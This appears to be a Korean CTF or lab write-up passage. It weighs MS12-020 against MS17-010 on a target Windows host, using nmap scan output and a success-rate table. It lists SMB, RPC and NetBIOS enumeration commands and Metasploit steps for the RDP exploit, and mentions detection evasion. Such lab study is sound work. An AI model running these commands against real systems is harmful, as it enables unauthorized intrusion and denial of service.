rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM)
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH)
분석:
smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
분석:
samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
smb-vuln-ms10-054: false
smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
분석:
| 취약점 | 성공률 | 안정성 | 복잡도 |
|---|---|---|---|
| MS12-020 | 30-50% | 낮음 | 높음 |
| MS17-010 | 95%+ | 높음 | 낮음 |
# MS12-020의 문제점들
1. 익스플로잇이 복잡하고 불안정
2. 시스템 크래시 위험 높음
3. 성공해도 권한이 제한적일 수 있음
4. 여러 번 시도 시 서비스 다운 가능성
# MS17-010의 장점들
1. 거의 확실한 성공률
2. 즉시 SYSTEM 권한 획득
3. 시스템 크래시 위험 낮음
4. 다양한 도구 지원 (MSF, 수동 스크립트 등)
# RDP 취약점 체크
nmap --script rdp-vuln-ms12-020 -p 3389 10.201.77.101
# 수동 익스플로잇 (매우 불안정)
git clone https://github.com/rapid7/metasploit-framework.git
# 또는 FreeRDP 기반 익스플로잇 사용
# 모든 SMB 취약점 체크
nmap --script smb-vuln* -p 139,445 10.201.77.101
# MS10-061 체크 (권한 문제로 정확한 테스트 어려움)
nmap --script smb-vuln-ms10-061 --script-args unsafe=1 -p 445 10.201.77.101
# MS10-054 체크
nmap --script smb-vuln-ms10-054 -p 445 10.201.77.101
# NetBIOS 열거
nbtscan 10.201.77.101
enum4linux -a 10.201.77.101
# RPC 열거
rpcclient -U "" -N 10.201.77.101
# SMB 공유 확인
smbclient -L //10.201.77.101 -N
smbmap -H 10.201.77.101
# 장점: 덜 알려진 취약점이라 탐지 회피 가능
# 단점: 불안정하고 실패 확률 높음
use exploit/windows/rdp/ms12_020_maxchannelids
set RHOST 10.201.77.101
exploit
# 현재 writeup에서 사용한 방법
# 가장 확실하고 안정적
# 1. SMB 공유 확인
# 2. 인증 우회 시도
# 3. RPC 정보 수집
# 4. 취약점 익스플로잇
CTF/실습 환경의 특성
실무적 고려사항
학습 목적
따라서 다른 취약점들도 존재하지만, MS17-010이 가장 실용적이고 효과적인 선택이었던 것입니다.